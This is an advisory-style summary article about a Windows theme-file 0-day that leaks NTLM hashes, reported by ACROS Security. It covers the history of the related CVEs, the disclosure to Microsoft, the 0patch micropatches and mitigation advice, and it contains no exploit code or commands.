Introduction
A critical 0-day vulnerability has been discovered in all versions of Windows from Windows 7 to Windows 11 24H2. This vulnerability allows attackers to remotely capture NTLM authentication hashes [2] [3], posing significant security risks. The flaw was identified by ACROS Security during the development of a micropatch for a separate Windows vulnerability.
Description
All versions of Windows [2] [3], from Windows 7 to Windows 11 24H2 [2] [3] [4], contain a newly discovered 0-day vulnerability that allows attackers to remotely capture NTLM authentication hashes from users of affected systems [2]. This flaw was identified by ACROS Security while developing a micropatch for CVE-2024-38030, a medium-severity Windows themes spoofing vulnerability that Microsoft addressed in its July security update [2]. The newly identified vulnerability enables an authentication coercion attack [2] [3], where a vulnerable device is coerced into sending NTLM hashes—cryptographic representations of a user’s password—to an attacker’s system [2]. NTLM is often exploited in NTLM relay and Pass-the-Hash attacks, allowing attackers to authenticate as compromised users and access sensitive data.
This vulnerability is the third associated with the same file path issue, following previous concerns raised by Akamai researcher Tomer Peled regarding CVE-2024-21320, which also involved theme files and the potential leakage of NTLM credentials when a malicious theme file is viewed in Windows Explorer. The original vulnerability allowed attackers to manipulate theme files to trigger authenticated requests that included NTLM hashes [3]. Notably, the patch for CVE-2024-21320 utilized the PathIsUNC function, which had known bypass methods [1], leading to the discovery of CVE-2024-38030.
ACROS Security reported the vulnerability to Microsoft on October 28, 2024 [2] [3], and plans to release further details and a proof-of-concept after Microsoft issues its patch [2]. Microsoft acknowledged the report and stated it would take necessary actions to protect customers [3], although no CVE has been assigned yet for this new issue [3]. The vulnerability does not require special privileges for an attacker [3], but they must convince a user to interact with a malicious theme file [3].
In response to these vulnerabilities, ACROS Security has created micropatches for both legacy and supported Windows versions through its 0patch service, providing users with unofficial security patches until Microsoft releases official fixes. These micropatches prevent network requests that could expose NTLM credentials when viewing theme files and have been automatically distributed to affected systems with the 0patch Agent. Users can also apply group policies to block NTLM hashes, as described in CVE-2024-21320. Recommendations include disabling NTLM where feasible [3], although this may lead to functional issues if any network components rely on it [2]. The attack requires that the malicious request reach the attacker’s server [3], which is typically blocked by firewalls [3], suggesting that exploitation is more likely to occur in targeted campaigns rather than widespread attacks. 0patch plans to continue supporting Windows 10 after its end of support in October 2025, ensuring ongoing protection for users [1].
Conclusion
The discovery of this vulnerability underscores the ongoing challenges in securing Windows systems against sophisticated attacks. While ACROS Security has provided interim micropatches, users must remain vigilant and apply all available security measures, including disabling NTLM where possible [3]. Microsoft’s forthcoming patch will be crucial in mitigating this threat. The situation highlights the importance of proactive vulnerability management and the need for continuous support for legacy systems to protect against emerging threats.
References
[1] https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html
[2] https://aiandtechs.com/recurring-home-windows-flaw-might-expose-person-credentials/
[3] https://www.darkreading.com/vulnerabilities-threats/recurring-windows-flaw-could-expose-user-credentials
[4] https://www.hfrance.fr/de/der-neue-fehler-bei-den-windows-designs-wurde-mit-kostenlosen-inoffiziellen-patches-behoben.html